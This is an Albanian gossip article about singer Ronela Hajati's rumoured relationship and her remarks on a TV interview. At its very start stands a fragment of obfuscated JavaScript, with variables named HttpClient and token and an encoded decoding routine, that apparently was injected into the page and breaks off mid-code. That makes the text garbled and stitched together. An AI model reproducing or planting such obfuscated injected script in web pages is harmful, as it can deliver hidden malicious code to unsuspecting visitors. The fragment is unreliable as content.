;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

I duhet ta thotë sërish: Është në lidhje apo jo Ronela Hajati?

By

Ronela Hajati është përfolur shpesh për jetën e saj private, edhe pse është përpjekur gjithmonë të tregohet e rezervuar. Mes thashethemeve për një lidhje të mundshme me reperin Young Zerka, Ronela nuk ka dhënë asnjë deklaratë zyrtare. Por, a ka dikë të veçantë këngëtarja në jetën e saj?

Përveç përgjigjes që ka dhënë për Prive muaj më parë, Ronela është përgjigjur sërish tek Rudina Magjistari të enjten, ku ka folur fillimisht mbi statusin e saj në këtë periudhë të fundit.

“Jam mirë dhe s’para e kam thënë këtë gjë. E mira s’ka kufi, por jam e qetë, nuk kam 100 halle dhe probleme dhe jam fokusuar në punë”, ka thënë Hajati, duke lënë të nënkuptohet se ekziston dikush që e plotëson në fushën e romancës. Ose të paktën, kështu mendohet pas një përgjigje të tillë për pyetjen: ‘A je e dashuruar?’

Pas kësaj, Ronela rrëfeu se do të gjejë momentin e duhur për t’i bërë gjërat publike, pasi dëshiron të realizojë një dasmë të madhe. “Jam shumë pro dasmës së madhe”, ka sqaruar Hajati, shkruan Xing.al, duke shtuar se arsyeja pse tregohet kaq e rezervuar vjen si pasojë e lajmeve që nuk fokusohen sa duhet në atë çka ajo investohet më shumë, siç është edhe karriera muzikore.

 

Artikuj të ngjashëm